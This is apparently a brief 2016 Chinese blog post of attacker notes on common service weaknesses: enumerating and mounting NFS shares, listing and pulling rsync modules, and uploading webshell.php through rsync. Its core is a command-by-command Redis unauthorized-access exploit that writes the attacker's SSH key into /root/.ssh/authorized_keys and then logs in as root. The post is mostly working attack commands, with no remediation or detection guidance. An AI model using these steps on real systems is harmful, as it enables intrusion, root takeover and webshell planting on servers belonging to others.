常见漏洞

NFS漏洞:(Network File System 即网络文件系统NFS 默认工作在2049端口)

目录列举:

方法1:

nmap -script=nfs-ls.nse 127.0.0.1

 

方法2. 

挂载到本地

 mount -t nfs 192.168.0.1:/export/home  /tmp/badperms

 为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容。

 

Rsync  (linux下的文件同步服务,默认工作在873端口,centos6.3上已经默认安装)

目录列举

方法1:

nmap -script=rsync-list-modules 127.0.0.1

 

方法2. 

 列举整个同步目录或指定目录:

   rsync 10.0.0.12::

   rsync 10.0.0.12::www/

下载文件或目录到本地:

   rsync -avz 10.0.0.12::www/test.php /root

   rsync -avz 10.0.0.12::www//var/tmp

上传本地文件到服务端:

  rsync -avz webshell.php 10.0.0.12::www/

Redis 未授权访问缺陷可轻易导致系统被黑

 

 1 $ssh-keygen -t rsa //本地产生公私钥文件
 2 $(echo -e "\n\n" ;cat id_rsa.pub;echo -e "\n\n") >  foo.txt //将公钥写入foo.txt文件
 3 $cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
 4 $redis-cli -h 192.168.1.11
 5 $ 192.168.1.11:6379> config set dir /root/.ssh/
 6 OK
 7 $ 192.168.1.11:6379> config get dir
 8 1) "dir"
 9 2) "/root/.ssh"
10 $ 192.168.1.11:6379> config set dbfilename "authorized_keys"
11 OK
12 $ 192.168.1.11:6379> save
13 OK

 

这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:

$ ssh –i  id_rsa root@192.168.1.11

即可远程利用自己的私钥登录该服务器。

当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。

 

详情请点此链接:https://www.seebug.org/vuldb/ssvid-89715

 

基于约束的SQL攻击

详情见地址:http://www.phpbug.cn/archives/639.html#more-639

 

posted @ 2016-11-26 20:27  tr1ple  阅读(468)  评论(0编辑  收藏  举报